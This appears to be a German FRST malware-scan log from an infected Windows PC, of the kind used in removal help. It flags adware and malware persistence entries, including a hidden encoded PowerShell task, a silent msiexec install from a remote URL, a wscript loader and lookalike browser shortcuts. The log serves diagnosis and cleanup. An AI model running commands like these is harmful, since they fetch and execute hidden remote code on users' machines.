(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) =============
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
Task: {07D082A4-BB0D-42C3-8BB9-5E3E9CD9005F} - System32\Tasks\One System Care Task => C:\Program Files (x86)\OneSystemCare\SystemConsole.exe [2016-12-26] () <==== ACHTUNG
Task: {07D50CCA-2188-43A1-897B-EF2C5815E13F} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2016-08-26] (Piriform Ltd)
Task: {08BC7C06-525E-43F2-B72E-DDCD9E7C4DD6} - System32\Tasks\Microsoft\Windows\Media Center\RecordingRestart => %SystemRoot%\ehome\ehrec.exe
Task: {0CD166F7-D57D-4AB4-8CE2-07FD0953AD42} - System32\Tasks\SystemHealer Run Delay => C:\Program Files (x86)\SystemHealer\SystemHealer.exe [2016-12-26] () <==== ACHTUNG
Task: {1A3181DF-833E-436D-A30C-248F034B8623} - System32\Tasks\NvTmRep_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [2017-01-20] (NVIDIA Corporation)
Task: {1EA42CBF-EADD-4B00-81ED-2C40E4238B7C} - System32\Tasks\NvTmMon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmMon.exe [2017-01-20] (NVIDIA Corporation)
Task: {3024B4B3-FD37-477F-BA7A-04E9D557A0DF} - System32\Tasks\Microsoft\Windows\Media Center\SqlLiteRecoveryTask => %SystemRoot%\ehome\mcupdate.exe
Task: {338C4099-111D-4274-9855-DC0ACCC34B35} - System32\Tasks\HDWallPaper => C:\Program Files (x86)\HDWallPaper\HDWallPaper.exe [2016-11-02] (HDWallPaper) <==== ACHTUNG
Task: {358E9F01-B54F-4F1A-A590-566825F4CCF6} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscovery => %SystemRoot%\ehome\ehPrivJob.exe
Task: {3782FA31-E821-4B7B-9FD3-1FC42377DBD5} - System32\Tasks\Microsoft\Windows\Media Center\InstallPlayReady => %SystemRoot%\ehome\ehPrivJob.exe
Task: {3A539CDD-D9FE-4485-BB5E-F119374C2E2B} - System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [2017-01-20] (NVIDIA Corporation)
Task: {3B7398CA-6B98-47E4-BFFB-FB8AEB3C62F8} - System32\Tasks\Microsoft\Windows\Media Center\DispatchRecoveryTasks => %SystemRoot%\ehome\ehPrivJob.exe
Task: {438725D4-69D8-4445-B2DA-9A70D2F233ED} - System32\Tasks\PC Clean Plus_DEFAULT => C:\Program Files (x86)\PC Clean Plus\PCCleanPlus.exe [2017-01-05] (PC Clean Plus) <==== ACHTUNG
Task: {535076EF-9CD5-46BA-A7C8-10EEDDA703A2} - System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [2017-01-20] (NVIDIA Corporation)
Task: {595ED7A0-ED76-4B70-9B39-AA80B04DC0D1} - System32\Tasks\Microsoft\Windows\Media Center\RegisterSearch => %SystemRoot%\ehome\ehPrivJob.exe
Task: {5D60C962-36C5-4A56-A06A-6FD1172E85A4} - System32\Tasks\One System Care Monitor => C:\Program Files (x86)\OneSystemCare\CleanupConsole.exe [2016-12-26] () <==== ACHTUNG
Task: {60FA74FF-6279-4ECD-9EA9-5DE73A58257E} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate_scheduled => %SystemRoot%\ehome\mcupdate.exe
Task: {71C58D38-8A13-46DD-8D3E-D7EDF04F9F41} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW1 => %SystemRoot%\ehome\ehPrivJob.exe
Task: {74E7882B-EC43-4B32-87E6-E11EFB4D4BAA} - System32\Tasks\Microsoft\Windows\Media Center\OCURDiscovery => %SystemRoot%\ehome\ehPrivJob.exe
Task: {7AD619ED-FDE2-44B2-B257-1E4E9D88D80E} - System32\Tasks\RunAtStartup => C:\Users\Barbara\AppData\Roaming\Event Monitor\em.exe [2017-01-05] () <==== ACHTUNG
Task: {81E58287-3D1D-4B96-8E11-D031A50025F6} - System32\Tasks\SystemHealer Monitor => C:\Program Files (x86)\SystemHealer\HealerConsole.exe [2016-12-26] () <==== ACHTUNG
Task: {82C50AED-8035-414F-9332-DE47AED14F1A} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2016-12-19] (Adobe Systems Incorporated)
Task: {8621A79A-23F3-402E-B829-1B3C08FC23C6} - System32\Tasks\Microsoft\Windows\Media Center\ActivateWindowsSearch => %SystemRoot%\ehome\ehPrivJob.exe
Task: {8AE506E1-EC61-4874-B4FD-1DACFAEF47EE} - System32\Tasks\SMW_P => C:\ProgramData\smp2.exe [2017-02-12] () <==== ACHTUNG
Task: {8FEDA5A7-F6AE-459A-895E-3269F9B87DC5} - System32\Tasks\108l42A89c7603 => Rundll32.exe "C:\ProgramData\108l42A89c7603\108l42A89c7603.dll",lAcqxFh <==== ACHTUNG
Task: {917F73AC-B595-428F-9D7E-804DD4CA0B19} - System32\Tasks\OneDrive Standalone Update Task => C:\Users\Barbara\AppData\Local\Microsoft\OneDrive\17.3.6517.0809\OneDriveStandaloneUpdater.exe
Task: {931E12E2-BA73-4859-AF12-777A31166AB5} - System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NvNode\nvnodejslauncher.exe [2017-01-20] (NVIDIA Corporation)
Task: {94874025-16A1-42F6-BF7D-4DDF56156E6C} - System32\Tasks\PC Clean Plus_UPDATES => C:\Program Files (x86)\PC Clean Plus\PCCleanPlus.exe [2017-01-05] (PC Clean Plus) <==== ACHTUNG
Task: {981171F7-EB47-47C7-9E26-7F1DE33B4C5E} - System32\Tasks\Microsoft\Windows\Media Center\UpdateRecordPath => %SystemRoot%\ehome\ehPrivJob.exe
Task: {9AF8C6A8-27BD-459C-A0B6-149FCF640506} - System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [2017-01-20] (NVIDIA Corporation)
Task: {A23D98E2-25C7-4A4E-A93A-5277AAE5D6BD} - System32\Tasks\Microsoft\Windows\Media Center\PvrScheduleTask => %SystemRoot%\ehome\mcupdate.exe
Task: {A9DC2516-E3BE-4B34-AE6A-49DECD192D48} - System32\Tasks\Microsoft\Windows\Media Center\OCURActivate => %SystemRoot%\ehome\ehPrivJob.exe
Task: {ABD44F90-CD20-4C95-AA96-464B6AEE71FE} - System32\Tasks\Microsoft\Windows\Media Center\ReindexSearchRoot => %SystemRoot%\ehome\ehPrivJob.exe
Task: {AED5C637-95A0-4DD0-ADC7-A4808E2FACE9} - System32\Tasks\Microsoft\Windows\Media Center\PeriodicScanRetry => %windir%\ehome\MCUpdate.exe
Task: {B3737810-7B5B-49FA-ABF7-D2566CB7161D} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW2 => %SystemRoot%\ehome\ehPrivJob.exe
Task: {B73E6B94-97F6-4185-B265-5AF584ADD7C2} - System32\Tasks\Microsoft\Windows\Media Center\ObjectStoreRecoveryTask => %SystemRoot%\ehome\mcupdate.exe
Task: {B8A37631-3077-4955-BA7D-5E165F4C4DB5} - System32\Tasks\Microsoft\Windows\Media Center\ehDRMInit => %SystemRoot%\ehome\ehPrivJob.exe
Task: {BF709A57-E750-4DDD-B582-32B6C514637F} - System32\Tasks\{7D0D0E47-797A-7F7A-7D11-7D797E041105} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand OwAgACAAOwAgADsAOwAgACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AG kAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0A (Der Dateneintrag hat 10008 mehr Zeichen). <==== ACHTUNG
Task: {C0F5AE71-6716-4F6C-ADC4-059DF01B35BA} - System32\Tasks\Microsoft\Windows\Media Center\StartRecording => %SystemRoot%\ehome\ehrec.exe
Task: {C1B4B136-C33D-4401-AED3-81D2C9151669} - System32\Tasks\Microsoft\Windows\Media Center\PvrRecoveryTask => %SystemRoot%\ehome\mcupdate.exe
Task: {C66406B3-BC53-4127-ACE4-04BF99EB50C5} - System32\Tasks\System Healer Task => C:\Program Files (x86)\SystemHealer\RescueMonitor.exe [2016-12-26] () <==== ACHTUNG
Task: {CE9FBA87-1B2B-4985-9994-F3FC89A66F04} - System32\Tasks\PC Clean Plus => C:\Program Files (x86)\PC Clean Plus\PCCleanPlus.exe [2017-01-05] (PC Clean Plus) <==== ACHTUNG
Task: {CF59DDC9-64FA-4592-BA4C-996DE144E956} - System32\Tasks\NvTmRepOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [2017-01-20] (NVIDIA Corporation)
Task: {D15D9A6F-7B7C-46FF-B72E-989CE158ACF1} - System32\Tasks\Microsoft\Windows\Media Center\MediaCenterRecoveryTask => %SystemRoot%\ehome\mcupdate.exe
Task: {D20E72EA-E1B2-4FCA-90F2-94F73460A59C} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate => %SystemRoot%\ehome\mcupdate.exe
Task: {E3BEDC84-1FC4-462C-B3DA-C04B65228E1C} - System32\Tasks\Pregehabering => msiexec /i hxxp://d2buh1bf1g584w.cloudfront.net/msi/rel.php?u=SamsungXSSDX840XEVOX250GB_S1DBNSBF263398Y&v=2017212 /q
Task: {ED9678EB-B078-4A94-A29D-89D8596AB858} - System32\Tasks\Atikationbogot System => C:\Program Files (x86)\Plidaing\drerzes.exe [2017-02-12] (Glarysoft Ltd)
Task: {EF1F752D-CA59-470C-BB1B-D66C885E54E5} - System32\Tasks\Microsoft\Windows\Media Center\ConfigureInternetTimeService => %SystemRoot%\ehome\ehPrivJob.exe
Task: {F39C9638-2646-42EF-8938-336B0252CBDD} - System32\Tasks\EhXuia58iw => C:\Program Files (x86)\vpF0TnTYqt\updengine.exe [2017-02-11] () <==== ACHTUNG
Task: {FC3AC33B-0D31-463D-92B3-AE425ADE0BA4} - System32\Tasks\SMW_UpdateTask_Time_323832303833353732332d374a55414134502a576c4a5a => Wscript.exe //B "C:\ProgramData\SearchModule\smhe.js" smu.exe /invoke /f:check_services /l:0 <==== ACHTUNG
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)
Task: C:\WINDOWS\Tasks\PC Clean Plus_DEFAULT.job => C:\Program Files (x86)\PC Clean Plus\PCCleanPlus.exe <==== ACHTUNG
Task: C:\WINDOWS\Tasks\PC Clean Plus_UPDATES.job => C:\Program Files (x86)\PC Clean Plus\PCCleanPlus.exe <==== ACHTUNG
==================== Verknüpfungen =============================
(Die Einträge können gelistet werden, um sie zurückzusetzen oder zu entfernen.)
Shortcut: C:\Users\Barbara\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Intеrnеt Ехplоrеr.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.bat ()
Shortcut: C:\Users\Barbara\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Lаunсh Intеrnеt Ехplоrеr Вrоwsеr.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.bat ()
Shortcut: C:\Users\Barbara\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Моzillа Firеfох.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.bat ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Моzillа Firеfох.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.bat ()
ShortcutWithArgument: C:\Users\Barbara\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Microsoft Edge.lnk -> C:\Windows\explorer.exe (Microsoft Corporation) -> "microsoft-edge:hxxp://www%2dsearching.com/?prd=set_epe&s=H2Czbcnbl1AU,e757b544-b7e3-4f69-a055-fbd9a7e08b83,"
ShortcutWithArgument: C:\Users\Barbara\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Search.lnk -> C:\program files\internet explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www%2dsearching.com/?prd=set_epe&s=H2Czbcnbl1AU,e757b544-b7e3-4f69-a055-fbd9a7e08b83,
==================== Geladene Module (Nicht auf der Ausnahmeliste) ==============
2017-02-12 22:13 - 2014-03-22 12:34 - 02997760 _____ () C:\ProgramData\108l42A89c7603\108l42A89c7603.dll
2017-02-12 22:13 - 2017-02-12 22:13 - 00316928 _____ () C:\Program Files (x86)\Atikationbogot System\local64spl.dll
2017-02-12 22:14 - 2017-02-12 22:07 - 03786752 _____ () C:\ProgramData\Logic Handler\set.exe
2017-02-12 22:13 - 2017-02-12 22:13 - 00230400 _____ () C:\Program Files (x86)\da002918-daba-4445-a323-cc3eefdf9d091486934027\protda002918-daba-4445-a323-cc3eefdf9d09.tmpfs
2017-02-12 22:14 - 2017-02-12 22:14 - 00470592 _____ () C:\WINDOWS\SysWoW64\NetUtils2016.exe
2017-02-12 22:13 - 2017-02-12 23:06 - 00043520 _____ () C:\ProgramData\NetworkPacketManitor\Nettrans.exe
2016-10-13 07:34 - 2017-01-20 19:39 - 04489152 _____ () C:\Program Files\NVIDIA Corporation\NvContainer\Poco.dll
2016-10-13 07:34 - 2017-01-20 19:39 - 01147328 _____ () C:\Program Files\NVIDIA Corporation\NvContainer\libprotobuf.dll
2017-02-12 22:15 - 2017-02-12 22:14 - 00983040 _____ () C:\ProgramData\Zaamla\Zaamla.exe
2017-02-12 22:14 - 2017-02-13 19:05 - 00625272 _____ () C:\Windows\System32\NetUtils2016.dll
2016-07-16 12:42 - 2016-07-16 12:42 - 00231424 _____ () C:\WINDOWS\SYSTEM32\ism32k.dll
2016-12-16 16:18 - 2016-12-09 11:29 - 02681200 _____ () C:\WINDOWS\System32\CoreUIComponents.dll
2016-09-23 02:40 - 2016-12-29 13:44 - 00134712 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll
2016-12-16 16:18 - 2016-12-09 11:29 - 02681200 _____ () C:\WINDOWS\system32\CoreUIComponents.dll
2016-12-26 10:35 - 2016-12-26 10:35 - 02238656 _____ () C:\Program Files (x86)\OneSystemCare\CleanupConsole.exe
2016-12-26 11:19 - 2016-12-26 11:19 - 01582240 _____ () C:\Program Files (x86)\SystemHealer\HealerConsole.exe
2016-12-16 16:18 - 2016-12-09 11:29 - 02681200 _____ () C:\WINDOWS\SYSTEM32\CoreUIComponents.dll
2017-02-12 22:14 - 2017-02-12 22:15 - 00248320 _____ () C:\Users\Barbara\AppData\Local\Temp\gCEF9.tmp.exe
2016-09-23 03:38 - 2016-09-23 03:38 - 00134656 _____ () C:\Windows\ShellExperiences\Windows.UI.Shell.SharedUtilities.dll
2017-01-10 21:04 - 2016-12-21 08:09 - 00474112 _____ () C:\Windows\ShellExperiences\QuickActions.dll
2017-01-10 20:59 - 2016-12-21 07:54 - 09760768 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2017-01-10 20:59 - 2016-12-21 07:48 - 01401856 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2017-01-10 20:59 - 2016-12-21 07:48 - 00757248 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CSGSuggestLib.dll
2017-01-10 20:59 - 2016-12-21 07:48 - 01033216 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Actions.dll
2017-01-10 20:59 - 2016-12-21 07:48 - 02424320 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
2017-01-10 20:59 - 2016-12-21 07:53 - 04853760 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
2017-02-12 22:14 - 2017-01-05 18:45 - 03292608 _____ () C:\Users\Barbara\AppData\Roaming\Event Monitor\em.exe
2017-01-10 20:59 - 2016-12-21 07:47 - 00114176 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Dss.BackgroundTask.dll
2016-08-26 19:25 - 2016-08-26 19:25 - 00061440 _____ () C:\Program Files\CCleaner\lang\lang-1031.dll
2016-09-29 08:07 - 2016-09-29 08:07 - 47824832 _____ () C:\Users\Barbara\AppData\Roaming\AppTrailers\AppTrailers.exe
2017-02-11 11:46 - 2017-02-11 11:46 - 01107456 _____ () C:\Program Files (x86)\vpF0TnTYqt\kl.dll
2016-10-22 12:18 - 2016-10-22 12:18 - 02493440 _____ () C:\Program Files (x86)\Origin\libGLESv2.dll
2016-10-13 07:34 - 2017-01-20 19:39 - 00018880 _____ () C:\Program Files (x86)\NVIDIA Corporation\Update Core\detoured.dll
2016-10-13 07:34 - 2017-01-20 19:39 - 03774400 _____ () C:\Program Files (x86)\NVIDIA Corporation\NvContainer\Poco.dll
2016-10-13 07:34 - 2017-01-20 19:39 - 00900032 _____ () C:\Program Files (x86)\NVIDIA Corporation\NvContainer\libprotobuf.dll
2016-10-13 07:34 - 2017-01-20 19:38 - 64245184 _____ () C:\Program Files (x86)\NVIDIA Corporation\NVIDIA GeForce Experience\libcef.dll
2016-10-13 07:34 - 2017-01-20 14:36 - 00338488 _____ () \\?\C:\Program Files (x86)\NVIDIA Corporation\NvNode\NVAccountAPINode.node
2016-10-13 07:34 - 2017-01-20 14:36 - 00254008 _____ () \\?\C:\Program Files (x86)\NVIDIA Corporation\NvNode\DriverInstall.node
2016-10-13 07:34 - 2017-01-20 14:36 - 02808888 _____ () \\?\C:\Program Files (x86)\NVIDIA Corporation\NvNode\Downloader.node
2016-10-13 07:34 - 2017-01-20 14:36 - 00384568 _____ () \\?\C:\Program Files (x86)\NVIDIA Corporation\NvNode\NvGameShareAPINode.node
2016-10-13 07:34 - 2017-01-20 14:36 - 00537656 _____ () \\?\C:\Program Files (x86)\NVIDIA Corporation\NvNode\NvSpCapsAPINode.node
2016-10-13 07:34 - 2017-01-20 14:36 - 00468024 _____ () \\?\C:\Program Files (x86)\NVIDIA Corporation\NvNode\NvGalleryAPINode.node
2016-10-13 07:34 - 2017-01-20 14:36 - 01066552 _____ () \\?\C:\Program Files (x86)\NVIDIA Corporation\NvNode\NvCameraAPINode.node
2017-02-03 17:12 - 2017-01-20 14:36 - 01014840 _____ () \\?\C:\Program Files (x86)\NVIDIA Corporation\NvNode\NvSDKAPINode.node
==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) =========
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird nur der ADS entfernt.)
AlternateDataStreams: C:\ProgramData\Reprise:wupeogjxldtlfudivq`qsp`27hfm [0]
==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ===================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Der Wert "AlternateShell" wird wiederhergestellt.)
==================== Verknüpfungen (Nicht auf der Ausnahmeliste) ===============
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt.)
==================== Internet Explorer Vertrauenswürdig/Eingeschränkt ===============
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt.)
==================== Hosts Inhalt: ===============================
(Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.)
2009-07-14 03:34 - 2017-02-12 22:14 - 00000833 ____A C:\WINDOWS\system32\Drivers\etc\hosts
==================== Andere Bereiche ============================
(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)
HKU\S-1-5-21-1500252791-3377746768-789393517-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Barbara\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper
DNS Servers: Datenträger ist nicht mit dem Internet verbunden.
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall ist aktiviert.
==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge ==
HKLM\...\StartupApproved\Run: => "gplyra"
HKLM\...\StartupApproved\Run32: => "MyMemory"
HKU\S-1-5-21-1500252791-3377746768-789393517-1000\...\StartupApproved\Run: => "Spotify"
HKU\S-1-5-21-1500252791-3377746768-789393517-1000\...\StartupApproved\Run: => "Steam"
HKU\S-1-5-21-1500252791-3377746768-789393517-1000\...\StartupApproved\Run: => "x5o3Yv2CQw.exe"
HKU\S-1-5-21-1500252791-3377746768-789393517-1000\...\StartupApproved\Run: => "zC6b23GTAV.exe"
HKU\S-1-5-21-1500252791-3377746768-789393517-1000\...\StartupApproved\Run: => "GWH9N93A6U"
HKU\S-1-5-21-1500252791-3377746768-789393517-1000\...\StartupApproved\Run: => "JLAWFPN14I"
HKU\S-1-5-21-1500252791-3377746768-789393517-1000\...\StartupApproved\Run: => "XN55R0BYZD"
HKU\S-1-5-21-1500252791-3377746768-789393517-1000\...\StartupApproved\Run: => "LAMMPX75X6"
HKU\S-1-5-21-1500252791-3377746768-789393517-1000\...\StartupApproved\Run: => "JG5BHCSAVC"
==================== Firewall Regeln (Nicht auf der Ausnahmeliste) ===============
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
FirewallRules: [vm-monitoring-nb-session] => LPort=139
FirewallRules: [MSMQ-In-TCP] => %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-Out-TCP] => %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-In-UDP] => %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-Out-UDP] => %systemroot%\system32\mqsvc.exe
FirewallRules: [WCF-NetTcpActivator-In-TCP-64bit] => LPort=808
FirewallRules: [UDP Query User{89490B79-F7C4-449C-AEA9-7C67ECB9FB5B}D:\program files (x86)\the witcher 2\bin\witcher2.exe] => D:\program files (x86)\the witcher 2\bin\witcher2.exe
FirewallRules: [TCP Query User{4A234969-EDBC-4530-B847-6329B46AA77A}D:\program files (x86)\the witcher 2\bin\witcher2.exe] => D:\program files (x86)\the witcher 2\bin\witcher2.exe
FirewallRules: [UDP Query User{F111BCF2-9CBB-4742-9CFC-D23879181430}D:\program files (x86)\the witcher 2\bin\witcher2.exe] => D:\program files (x86)\the witcher 2\bin\witcher2.exe
FirewallRules: [TCP Query User{3DC38285-63C7-451A-AE42-5DB7E25FE3FB}D:\program files (x86)\the witcher 2\bin\witcher2.exe] => D:\program files (x86)\the witcher 2\bin\witcher2.exe
FirewallRules: [{C681929D-CAC5-43C1-8926-0E72B114FE4B}] => C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{51B20E6F-4269-4C1F-BCCF-4AE409514E34}] => C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{1EFF0FAC-0E9E-4E91-809B-2BBDDEF8994B}] => C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{51F45EC0-BB2A-4881-81A4-39592A9F1F50}] => C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [UDP Query User{592ABD94-223B-4029-ADAD-C4B4FCB9D173}C:\users\barbara\appdata\roaming\spotify\spotify.exe] => C:\users\barbara\appdata\roaming\spotify\spotify.exe
FirewallRules: [TCP Query User{E1123DD8-DF30-4BAF-95D0-0CD324E434C5}C:\users\barbara\appdata\roaming\spotify\spotify.exe] => C:\users\barbara\appdata\roaming\spotify\spotify.exe
FirewallRules: [{E755C63D-D036-4730-806E-F025F68F5F83}] => C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{EA936888-D98A-4A6D-8DD0-3AD3C9E0A3BE}] => C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [TCP Query User{B23562F6-99F7-40EB-85CA-F7BC0A871F26}C:\users\barbara\appdata\roaming\spotify\spotify.exe] => C:\users\barbara\appdata\roaming\spotify\spotify.exe
FirewallRules: [UDP Query User{B9E938BA-EF39-4E7E-85AB-3E80B71AFF38}C:\users\barbara\appdata\roaming\spotify\spotify.exe] => C:\users\barbara\appdata\roaming\spotify\spotify.exe
FirewallRules: [{DC1A5F54-BD72-48BE-9E47-2743168046A0}] => C:\Program Files\NVIDIA Corporation\NvContainer\NvContainer.exe
FirewallRules: [{552C0333-744D-467D-9BBA-8B77D85239E4}] => C:\Program Files\NVIDIA Corporation\NvContainer\NvContainer.exe
FirewallRules: [{D8E7A1C6-22AF-42A9-8E8C-58F55E9CE22C}] => C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exe
FirewallRules: [{E0D9EE58-C0E4-48F0-BDC9-947A2AB5CA23}] => C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{4ED0602B-CF04-4814-BAC6-89B59E81BAAC}] => C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{9D55ECBB-5F7C-4C93-8581-D680E589C6CE}] => C:\WINDOWS\system32\rundll32.exe
FirewallRules: [{4924DF91-5443-4BAE-9BEC-15B57C9999A8}] => C:\Windows\System32\rundll32.exe
FirewallRules: [{A59BD35A-44A3-4F57-9F0B-5AA14A9BACC0}] => C:\Windows\System32\rundll32.exe
FirewallRules: [{91FB1473-E8E8-4DCA-A666-B383F1335F45}] => C:\Windows\System32\rundll32.exe
FirewallRules: [{D5FD6AE9-1750-4861-93D9-3775F082B4E5}] => C:\Windows\System32\rundll32.exe
DomainProfile\AuthorizedApplications: [C:\Program Files\ARCHline 2015\\ARCHlineXP2015.exe] => C:\Program Files\ARCHline 2015\ARCHlineXP2015.exe:*:Enabled:ARCHline.XP 2015
DomainProfile\AuthorizedApplications: [C:\Program Files\ARCHline 2015\\ARCHlineXP2015.bin] => C:\Program Files\ARCHline 2015\ARCHlineXP2015.bin:*:Enabled:ARCHline.XP 2015
StandardProfile\AuthorizedApplications: [C:\Program Files\ARCHline 2015\\ARCHlineXP2015.exe] => C:\Program Files\ARCHline 2015\ARCHlineXP2015.exe:*:Enabled:ARCHline.XP 2015
StandardProfile\AuthorizedApplications: [C:\Program Files\ARCHline 2015\\ARCHlineXP2015.bin] => C:\Program Files\ARCHline 2015\ARCHlineXP2015.bin:*:Enabled:ARCHline.XP 2015
==================== Wiederherstellungspunkte =========================
25-01-2017 13:43:30 Windows Update
03-02-2017 17:33:02 Geplanter Prüfpunkt
09-02-2017 13:37:47 Windows Update
==================== Fehlerhafte Geräte im Gerätemanager =============
==================== Fehlereinträge in der Ereignisanzeige: =========================
Applikationsfehler:
==================
Error: (02/12/2017 10:27:20 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Programm PCCleanPlus.exe, Version 3.6.81.400 kann nicht mehr unter Windows ausgeführt werden und wurde beendet. Überprüfen Sie den Problemverlauf in der Systemsteuerung "Sicherheit und Wartung", um nach weiteren Informationen zum Problem zu suchen.
Prozess-ID: 474
Startzeit: 01d28576773e58a4
Beendigungszeit: 4294967295
Anwendungspfad: C:\Program Files (x86)\PC Clean Plus\PCCleanPlus.exe
Berichts-ID: 082a8569-f16a-11e6-b566-7824af3a6ca1
Vollständiger Name des fehlerhaften Pakets:
Auf das fehlerhafte Paket bezogene Anwendungs-ID:
Error: (02/12/2017 10:25:53 PM) (Source: Perflib) (EventID: 1008) (User: )
Description: Die Open-Prozedur für den Dienst "BITS" in der DLL "C:\Windows\System32\bitsperf.dll" war nicht erfolgreich. Die Leistungsdaten für diesen Dienst sind nicht verfügbar. Die ersten vier Bytes (DWORD) des Datenbereichs enthalten den Fehlercode.
Error: (02/12/2017 10:25:36 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Programm CleanupConsole.exe, Version 0.0.0.0 kann nicht mehr unter Windows ausgeführt werden und wurde beendet. Überprüfen Sie den Problemverlauf in der Systemsteuerung "Sicherheit und Wartung", um nach weiteren Informationen zum Problem zu suchen.
Prozess-ID: 165c
Startzeit: 01d2857673fc6ed1
Beendigungszeit: 4294967295
Anwendungspfad: C:\Program Files (x86)\OneSystemCare\CleanupConsole.exe
Berichts-ID: ca6acfd5-f169-11e6-b566-7824af3a6ca1
Vollständiger Name des fehlerhaften Pakets:
Auf das fehlerhafte Paket bezogene Anwendungs-ID:
Error: (02/12/2017 10:25:34 PM) (Source: Application Hang) (EventID: 1002) (User: )
